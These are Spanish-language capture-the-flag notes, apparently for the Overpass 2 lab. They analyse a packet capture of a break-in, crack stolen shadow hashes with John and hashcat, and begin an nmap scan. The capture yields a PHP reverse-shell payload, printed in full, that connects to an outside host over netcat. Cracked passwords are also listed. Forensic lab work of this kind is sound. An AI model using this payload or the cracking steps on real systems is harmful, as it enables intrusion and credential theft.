┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p | strings | grep cat
Running as user "root" and group "root". This could be dangerous.
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
Your identification has been saved in id_rsa.
FILTRAMOS POR PALABRA PAYLOAD TRATANDO DE VER SI VEMOS UN CONTENIDO SOLO LLAMA LA ATENCION DE QUE APARENTEMETE REMUEVE ARCHIVOS F DE /TMP ME SUENA A UNA ESCALADA DE PRIVILEGIOS O ES LA REVERSE SHELL:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -x | strings | grep -A 5 "payload"
Running as user "root" and group "root". This could be dangerous.
02b0 6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 2e 70 68 name="payload.ph
02c0 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 p"..Content-Type
02d0 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d : application/x-
02e0 70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65 php....<?php exe
02f0 63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66 c("rm /tmp/f;mkf
0300 69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f ifo /tmp/f;cat /
--
0110 65 20 66 69 6c 65 20 70 61 79 6c 6f 61 64 2e 70 e file payload.p
0120 68 70 20 68 61 73 20 62 65 65 6e 20 75 70 6c 6f hp has been uplo
0130 61 64 65 64 2e aded.
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 00 34 0a 2f 40 00 40 06 5a 13 c0 a8 aa 91 c0 a8 .4./@.@.Z.......
0020 aa 9f ba 76 00 50 9e c3 76 b3 3a 0d 13 1a 80 10 ...v.P..v.:.....
--
02d0 72 65 66 3d 22 70 61 79 6c 6f 61 64 2e 70 68 70 ref="payload.php
02e0 22 3e 70 61 79 6c 6f 61 64 2e 70 68 70 3c 2f 61 ">payload.php</a
02f0 3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d ></td><td align=
0300 22 72 69 67 68 74 22 3e 32 30 32 30 2d 30 37 2d "right">2020-07-
0310 32 31 20 32 30 3a 33 34 20 20 3c 2f 74 64 3e 3c 21 20:34 </td><
0320 74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22 td align="right"
0330 3e 20 39 39 20 3c 2f 74 64 3e 3c 74 64 3e 26 6e > 99 </td><td>&n
AHORA FILTRO POR .PHP QUE SABEMOS QUE ES LA EXTENSION DEL PAYLOAD:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -x | strings | grep -A 5 ".php"
Running as user "root" and group "root". This could be dangerous.
0390 74 68 69 6e 67 20 61 62 6f 75 74 20 70 68 70 20 thing about php
03a0 65 79 65 20 65 6e 20 65 79 65 3f 20 2d 2d 3e 0a eye en eye? -->.
03b0 20 20 20 20 20 20 3c 21 2d 2d 20 54 4f 44 4f 20 <!-- TODO
03c0 61 64 64 20 64 6f 77 6e 6c 6f 61 64 69 6e 67 20 add downloading
03d0 6f 66 20 79 6f 75 72 20 6f 76 65 72 70 61 73 73 of your overpass
03e0 20 66 69 6c 65 73 20 2d 2d 3e 0a 20 20 20 20 20 files -->.
--
0400 70 6c 6f 61 64 2e 70 68 70 22 20 6d 65 74 68 6f pload.php" metho
0410 64 3d 22 70 6f 73 74 22 20 65 6e 63 74 79 70 65 d="post" enctype
0420 3d 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d ="multipart/form
0430 2d 64 61 74 61 22 3e 0a 20 20 20 20 20 20 20 20 -data">.
0440 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d <div class="form
0450 45 6c 65 6d 22 3e 3c 6c 61 62 65 6c 20 66 6f 72 Elem"><label for
--
0050 65 6e 74 2f 75 70 6c 6f 61 64 2e 70 68 70 20 48 ent/upload.php H
0060 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31 TTP/1.1..Host: 1
0070 39 32 2e 31 36 38 2e 31 37 30 2e 31 35 39 0d 0a 92.168.170.159..
0080 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0090 6c 6c 61 2f 35 2e 30 20 28 58 31 31 3b 20 4c 69 lla/5.0 (X11; Li
00a0 6e 75 78 20 78 38 36 5f 36 34 3b 20 72 76 3a 36 nux x86_64; rv:6
--
02e0 70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65 php....<?php exe
02f0 63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66 c("rm /tmp/f;mkf
0300 69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f ifo /tmp/f;cat /
0310 74 6d 70 2f 66 7c 2f 62 69 6e 2f 73 68 20 2d 69 tmp/f|/bin/sh -i
0320 20 32 3e 26 31 7c 6e 63 20 31 39 32 2e 31 36 38 2>&1|nc 192.168
0330 2e 31 37 30 2e 31 34 35 20 34 32 34 32 20 3e 2f .170.145 4242 >/
--
02d0 72 65 66 3d 22 70 61 79 6c 6f 61 64 2e 70 68 70 ref="payload.php
02e0 22 3e 70 61 79 6c 6f 61 64 2e 70 68 70 3c 2f 61 ">payload.php</a
02f0 3e 3c 2f 74 64 3e 3c 74 64 20 61 6c 69 67 6e 3d ></td><td align=
0300 22 72 69 67 68 74 22 3e 32 30 32 30 2d 30 37 2d "right">2020-07-
0310 32 31 20 32 30 3a 33 34 20 20 3c 2f 74 64 3e 3c 21 20:34 </td><
0320 74 64 20 61 6c 69 67 6e 3d 22 72 69 67 68 74 22 td align="right"
0330 3e 20 39 39 20 3c 2f 74 64 3e 3c 74 64 3e 26 6e > 99 </td><td>&n
--
0060 61 64 2e 70 68 70 20 48 54 54 50 2f 31 2e 31 0d ad.php HTTP/1.1.
0070 0a 48 6f 73 74 3a 20 31 39 32 2e 31 36 38 2e 31 .Host: 192.168.1
0080 37 30 2e 31 35 39 0d 0a 55 73 65 72 2d 41 67 65 70.159..User-Age
0090 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 nt: Mozilla/5.0
00a0 28 58 31 31 3b 20 4c 69 6e 75 78 20 78 38 36 5f (X11; Linux x86_
00b0 36 34 3b 20 72 76 3a 36 38 2e 30 29 20 47 65 63 64; rv:68.0) Gec
--
00b0 61 64 2e 70 68 70 0d 0a ad.php..
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 00 34 77 58 40 00 40 06 ec e9 c0 a8 aa 91 c0 a8 .4wX@.@.........
0020 aa 9f 10 92 e1 50 67 a7 d4 c1 09 61 b0 98 80 10 .....Pg....a....
0030 01 fd ad d5 00 00 01 01 08 0a c2 14 45 11 35 50 ............E.5P
0040 cb ac ..
Y BINGO ESTE ME INTERESO, POR EL METODO POST Y EN EL EN LA REQUEST DEL ATACANTE TENDRIA QUE CONTENER EL SCRIPT, Y SE TENZO LO TENEMOS:
0400 70 6c 6f 61 64 2e 70 68 70 22 20 6d 65 74 68 6f pload.php" metho
0410 64 3d 22 70 6f 73 74 22 20 65 6e 63 74 79 70 65 d="post" enctype
0420 3d 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d ="multipart/form
0430 2d 64 61 74 61 22 3e 0a 20 20 20 20 20 20 20 20 -data">.
0440 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d <div class="form
0450 45 6c 65 6d 22 3e 3c 6c 61 62 65 6c 20 66 6f 72 Elem"><label for
AHORA CON UN FILTRO EN WIRESHARK VEMOS EL PAQUETE ESTE COMPLETO (http.request.uri contains "pload.php" && http.request.method == "POST"):
Internet Protocol Version 4, Src: 192.168.170.145, Dst: 192.168.170.159
Transmission Control Protocol, Src Port: 47734, Dst Port: 80, Seq: 1, Ack: 1, Len: 960
0000 00 0c 29 6e 18 17 00 0c 29 17 ba 48 08 00 45 00 ..)n....)..H..E.
0010 03 f4 0a 2e 40 00 40 06 56 54 c0 a8 aa 91 c0 a8 ....@.@.VT......
0020 aa 9f ba 76 00 50 9e c3 72 f3 3a 0d 12 27 80 18 ...v.P..r.:..'..
0030 01 f6 a9 f3 00 00 01 01 08 0a c2 13 a6 2b 35 50 .............+5P
0040 2c c6 50 4f 53 54 20 2f 64 65 76 65 6c 6f 70 6d ,.POST /developm
0050 65 6e 74 2f 75 70 6c 6f 61 64 2e 70 68 70 20 48 ent/upload.php H
0060 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31 TTP/1.1..Host: 1
0070 39 32 2e 31 36 38 2e 31 37 30 2e 31 35 39 0d 0a 92.168.170.159..
0080 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 User-Agent: Mozi
0090 6c 6c 61 2f 35 2e 30 20 28 58 31 31 3b 20 4c 69 lla/5.0 (X11; Li
00a0 6e 75 78 20 78 38 36 5f 36 34 3b 20 72 76 3a 36 nux x86_64; rv:6
00b0 38 2e 30 29 20 47 65 63 6b 6f 2f 32 30 31 30 30 8.0) Gecko/20100
00c0 31 30 31 20 46 69 72 65 66 6f 78 2f 36 38 2e 30 101 Firefox/68.0
00d0 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 ..Accept: text/h
00e0 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f tml,application/
00f0 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 xhtml+xml,applic
0100 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 2c ation/xml;q=0.9,
0110 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 41 63 63 65 70 */*;q=0.8..Accep
0120 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d 55 t-Language: en-U
0130 53 2c 65 6e 3b 71 3d 30 2e 35 0d 0a 41 63 63 65 S,en;q=0.5..Acce
0140 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 pt-Encoding: gzi
0150 70 2c 20 64 65 66 6c 61 74 65 0d 0a 52 65 66 65 p, deflate..Refe
0160 72 65 72 3a 20 68 74 74 70 3a 2f 2f 31 39 32 2e rer: http://192.
0170 31 36 38 2e 31 37 30 2e 31 35 39 2f 64 65 76 65 168.170.159/deve
0180 6c 6f 70 6d 65 6e 74 2f 0d 0a 43 6f 6e 74 65 6e lopment/..Conten
0190 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 t-Type: multipar
01a0 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 t/form-data; bou
01b0 6e 64 61 72 79 3d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ndary=----------
01c0 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
01d0 2d 31 38 30 39 30 34 39 30 32 38 35 37 39 39 38 -180904902857998
01e0 37 30 33 31 35 31 35 32 36 30 30 30 36 0d 0a 43 7031515260006..C
01f0 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 ontent-Length: 4
0200 35 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 54..Connection:
0210 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 55 70 67 72 keep-alive..Upgr
0220 61 64 65 2d 49 6e 73 65 63 75 72 65 2d 52 65 71 ade-Insecure-Req
0230 75 65 73 74 73 3a 20 31 0d 0a 0d 0a 2d 2d 2d 2d uests: 1....----
0240 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
0250 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 30 39 30 34 39 ---------1809049
0260 30 32 38 35 37 39 39 38 37 30 33 31 35 31 35 32 0285799870315152
0270 36 30 30 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 60006..Content-D
0280 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d isposition: form
0290 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c -data; name="fil
02a0 65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65 eToUpload"; file
02b0 6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 2e 70 68 name="payload.ph
02c0 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 p"..Content-Type
02d0 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d : application/x-
02e0 70 68 70 0d 0a 0d 0a 3c 3f 70 68 70 20 65 78 65 php....<?php exe
02f0 63 28 22 72 6d 20 2f 74 6d 70 2f 66 3b 6d 6b 66 c("rm /tmp/f;mkf
0300 69 66 6f 20 2f 74 6d 70 2f 66 3b 63 61 74 20 2f ifo /tmp/f;cat /
0310 74 6d 70 2f 66 7c 2f 62 69 6e 2f 73 68 20 2d 69 tmp/f|/bin/sh -i
0320 20 32 3e 26 31 7c 6e 63 20 31 39 32 2e 31 36 38 2>&1|nc 192.168
0330 2e 31 37 30 2e 31 34 35 20 34 32 34 32 20 3e 2f .170.145 4242 >/
0340 74 6d 70 2f 66 22 29 3f 3e 0a 0d 0a 2d 2d 2d 2d tmp/f")?>...----
0350 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
0360 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 38 30 39 30 34 39 ---------1809049
0370 30 32 38 35 37 39 39 38 37 30 33 31 35 31 35 32 0285799870315152
0380 36 30 30 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 60006..Content-D
0390 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d isposition: form
03a0 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 75 62 -data; name="sub
03b0 6d 69 74 22 0d 0a 0d 0a 55 70 6c 6f 61 64 20 46 mit"....Upload F
03c0 69 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ile..-----------
03d0 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
03e0 2d 2d 31 38 30 39 30 34 39 30 32 38 35 37 39 39 --18090490285799
03f0 38 37 30 33 31 35 31 35 32 36 30 30 30 36 2d 2d 87031515260006--
0400 0d 0a ..
LO VEMOS AL PAYLOAD SCRIPT EN LIMPIO:
payload.ph
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
---------------- JONH THE RIPPER ---------------------
INTENTAREMOS HACER FUERZA BRUTA CON EL ROCKYOU PAR VER SI LOGRAMOS DECIFRAR LOS HASHES QUE VIMOS DE DOS USNARIOS DEL ETC/SHADOW QUE SACO EL ATACANTE DE NUESTRO SERVIDOR VICTIMA:
HASHES:
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
*****
JAMES:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.06% (ETA: 23:28:57) 0g/s 4876p/s 4876c/s 4876C/s 11221122..findingnemo
A LA ESPERA......
PROBAMOS CON EL DICCIONARIO FASTRACK y en teoria SERIA Spring2017..starwars:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_james.txt passwdjame.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2024-02-09 22:42) 0g/s 1480p/s 1480c/s 1480C/s Spring2017..starwars
Session completed.
******
MUIRLAND:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt --pot=results_muirland.txt passwdmuirland.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:02 0.06% (ETA: 23:28:57) 0g/s 4876p/s 4876c/s 4876C/s 11221122..findingnemo
A LA ESPERA......
TAMBIEN PROBAMOS CON FASTTRACK y SERIA EL PASSWD 1qaz2wsx:
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_muirland.txt passwdmuirland.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1qaz2wsx (?)
1g 0:00:00:00 DONE (2024-02-09 22:45) 7.692g/s 1707p/s 1707c/s 1707C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
******
PARADOX y TENEMOS SU PASSWD secuirty3 :
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_paradox.txt passwdparadox.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secuirty3 (?)
1g 0:00:00:00 DONE (2024-02-09 22:48) 12.50g/s 2775p/s 2775c/s 2775C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
*****
SZYMEX SU PASSWD abcd123 :
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_szymex.txt passwdszymex.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
abcd123 (?)
1g 0:00:00:00 DONE (2024-02-09 22:50) 12.50g/s 2775p/s 2775c/s 2775C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
*****
BEE SU PASWD secret12 :
┌──(root㉿kalipaimon)-[/home/paimon]
└─# john --wordlist=/usr/share/wordlists/fasttrack.txt --format=sha512crypt --pot=results_bee.txt passwdbee.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret12 (?)
1g 0:00:00:00 DONE (2024-02-09 22:51) 16.66g/s 3700p/s 3700c/s 3700C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
------ CONTINUAR CON OTRO TEMA ... :D
-------------------- PROBAMOS CON JOHN THE RIPPER ROOMPER EL HASH (QUE VIMOS QUE USABA EL ATACANTE EN LA LINEA DE COMANDO CUANDO EJECUTO SSHBACKDOOR ) CON EL SALT QUE SUMA EL SCRIPT A NUESTRO HASH, SEPARANDOLO CON : o SALTO DE LINEAS, y NO FUNCIONO CON JOHN, PERO LUEGO PROBAMOS CON HASCAT CON EL ARCHIVO HASH.TXT CON SU CONTENIDO HASH:SALT Y LUEGO DE PROBAR VARIAS FORMATOS DE SHA512, DIMOS CON EL QUE FUNCIONO QUE ERA (SHA-512 (crypt, BSDi) - Modo -m 1710) Y BINGO CONSEGUIMOS LA ROMPER LA CONTRASEÑA (november16)
PRUEVAS DE UNIR EL HAS Y SALT:
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e31c362db832f3f864c8c2fe05f2002a056d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
CREACION DEL ARCHIVO CON HASH:SALT:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# nano hashlistoparajondos.txt
┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# cat hashlistoparajondos.txt
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
ROMPEMOS EL HASH CON HASCAT Y SE TENZO:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas/jonhborrar]
└─# hashcat -a 0 -m 1710 hashlistoparajondos.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3600 6-Core Processor, 3813/7691 MB (1024 MB allocatable), 5MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
* Uses-64-Bit
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1710 (sha512($pass.$salt))
Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05
Time.Started.....: Mon Feb 12 04:44:49 2024 (0 secs)
Time.Estimated...: Mon Feb 12 04:44:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 268.7 kH/s (0.77ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 17920/14344385 (0.12%)
Rejected.........: 0/17920 (0.00%)
Restore.Point....: 15360/14344385 (0.11%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: soybella -> biscuit1
Hardware.Mon.#1..: Util: 21%
Started: Mon Feb 12 04:44:06 2024
Stopped: Mon Feb 12 04:44:50 2024
---------CAMINO DE VUELTA, HACKEAMOS LA MAQUINA OVERPASS2 REALIZANDO Y SIGUIENDO LOS MISMOS PASOS DEL ATACANTE QUE ANALISAMOS----
VERIFICAMOS EN EL SITIO WEB POR PUERTO 80 HAY UN MENSAJE EN EL HTML:
http://10.10.217.114/
<body>
<div>
<h1>H4ck3d by CooctusClan</h1>
</div>
<div>
<p>Secure your servers!</p>
</div>
<div><img src="cooctus.png"></div>
</body>
-------------------- NMAP ------------------------
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -Pn -O --script='vuln' 10.10.217.114
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-13 13:40 UTC
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-217-114.eu-west-1.compute.internal (10.10.217.114)
Host is up (0.0013s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.6p1:
| PRION:CVE-2019-6111 5.8 https://vulners.com/prion/PRION:CVE-2019-6111
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
| PRION:CVE-2018-15919 5.0 https://vulners.com/prion/PRION:CVE-2018-15919
| PRION:CVE-2018-15473 5.0 https://vulners.com/prion/PRION:CVE-2018-15473
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
| MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 5.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
